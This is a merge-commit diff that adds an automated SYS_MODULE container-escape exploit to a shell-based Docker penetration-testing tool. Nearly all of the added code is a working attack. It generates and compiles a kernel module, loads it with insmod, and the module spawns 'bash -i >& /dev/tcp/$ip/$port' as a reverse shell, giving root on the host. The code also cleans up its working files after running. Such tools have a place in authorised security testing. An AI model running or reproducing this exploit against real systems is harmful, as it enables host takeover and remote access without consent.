Merge pull request #26 from willrushi/cap_sys_module-exploit

SYS_MODULE auto exploit
stealthcopter · May 3, 2021 · 229fad0 · 229fad0
2 parents b20f62d + d853512
commit 229fad0
Showing 1 changed file with 112 additions and 0 deletions.
diff --git a/deepce.sh b/deepce.sh
@@ -67,6 +67,7 @@ Usage: ${0##*/} [OPTIONS...]
     SOCK                 use an exposed docker sock to create a new container and mount root partition to priv esc
     CVE-2019-5746
     CVE-2019-5021
+    SYS_MODULE           Exploit the SYS_MODULE privilege to create a malicious kernel module and obtain root on the host
 
   ${DG}[Payloads & Options]$NC
   -i, --ip               The local host IP address for reverse shells to connect to
@@ -125,6 +126,8 @@ TIP_CVE_2019_5021="Alpine linux version 3.3.x-3.5.x accidentally allow users to
 TIP_CVE_2019_13139="Docker versions before 18.09.4 are vulnerable to a command execution vulnerability when parsing URLs"
 TIP_CVE_2019_5736="Docker versions before 18.09.2 are vulnerable to a container escape by overwriting the runC binary"
 
+TIP_SYS_MODULE="Giving the container the SYS_MODULE privilege allows for kernel modules to be mounted. Using this, a malicious module can be used to execute code as root on the host."
+
 DANGEROUS_GROUPS="docker\|lxd\|root\|sudo\|wheel"
 DANGEROUS_CAPABILITIES="cap_sys_admin\|cap_sys_ptrace\|cap_sys_module\|dac_read_search\|dac_override"
 
@@ -1112,6 +1115,112 @@ exploitDockerSock() {
   # TODO: Tidy up command
 }
 
+exploitSysModule(){
+  printSection "Exploiting SYS_MODULE"
+  printTip "$TIP_SYS_MODULE"
+
+  if ! [ -x "$(command -v capsh)" ]; then
+    printError "capsh is required to run this exploit."
+    exit 1
+  fi
+
+  if ! [ -x "$(command -v make)" ]; then
+    printError "make is required to run this exploit."
+    exit 1
+  fi
+
+  if ! [ -x "$(command -v insmod)" ]; then
+    printError "insmod is required to run this exploit."
+    exit 1
+  fi
+
+  if ! [ -d "/lib/modules/$(uname -r)" ]; then
+    printError "Linux headers for $(uname -r) are required to run this exploit."
+    exit 1
+  fi
+
+  caps=$(capsh --print)
+  if ! echo "$caps" | grep -qa "cap_sys_module" ; then
+    printError "We don't have the SYS_MODULE capability, which is required for this exploit"
+    exit 1
+  fi
+
+  if [ -z "$ip" ]; then
+    printError "Missing reverse shell IP : use --ip"
+    exit 1
+  fi
+
+  if [ -z "$port" ]; then
+    printError "Missing reverse shell port : use --port"
+    exit 1
+  fi
+
+  module_name=$(tr -dc A-Za-z </dev/urandom | head -c 13)
+  sys_cwd=$(pwd)
+
+  mkdir /dev/shm/rev && cd /dev/shm/rev || exit 1
+
+  printQuestion "Writing scripts..."
+
+  # POC modified from https://blog.pentesteracademy.com/abusing-sys-module-capability-to-perform-docker-container-breakout-cf5c29956edd
+cat << EOF > "$module_name.c"
+#include <linux/kmod.h>
+#include <linux/module.h>
+MODULE_LICENSE("GPL");
+MODULE_AUTHOR("AttackDefense");
+MODULE_DESCRIPTION("LKM reverse shell module");
+MODULE_VERSION("1.0");
+char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/$ip/$port 0>&1", NULL};
+static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL };
+static int __init ${module_name}_init(void) {
+return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
+}
+static void __exit ${module_name}_exit(void) {
+}
+module_init(${module_name}_init);
+module_exit(${module_name}_exit);
+EOF
+
+cat << EOF > Makefile
+obj-m +=${module_name}.o
+all:
+	make -C /lib/modules/$(uname -r)/build M=$(pwd) modules
+clean:
+	make -C /lib/modules/$(uname -r)/build M=$(pwd) clean
+EOF
+
+  printSuccess "Done"
+
+  printQuestion "Compiling kernel module..."
+
+  if make 1>/dev/null ; then
+    printSuccess "Done"
+  else
+    printError "Failed to make. Do you have all the required libraries installed?"
+    exit 1
+  fi
+
+  printQuestion "Mounting kernel module..."
+
+  if insmod "$module_name.ko" 1>/dev/null ; then
+    printSuccess "Done"
+  else
+    printError "Failed to mount module"
+    exit 1
+  fi
+
+  printQuestion "Cleaning up..."
+
+  rm -r /dev/shm/rev
+
+  cd "$sys_cwd" || exit
+
+  printSuccess "Done"
+
+  printSuccess "Check your reverse shell handler!"
+
+}
+
 ###########################################
 #--------------) Arg Parse (--------------#
 ###########################################
@@ -1246,6 +1355,9 @@ if [ "$exploit" ]; then
   sock | SOCK)
     exploitDockerSock
     ;;
+  sys | SYS | sys_module | SYS_MODULE)
+    exploitSysModule
+    ;;
   *)
     echo "Unknown exploit $1"
     exit 1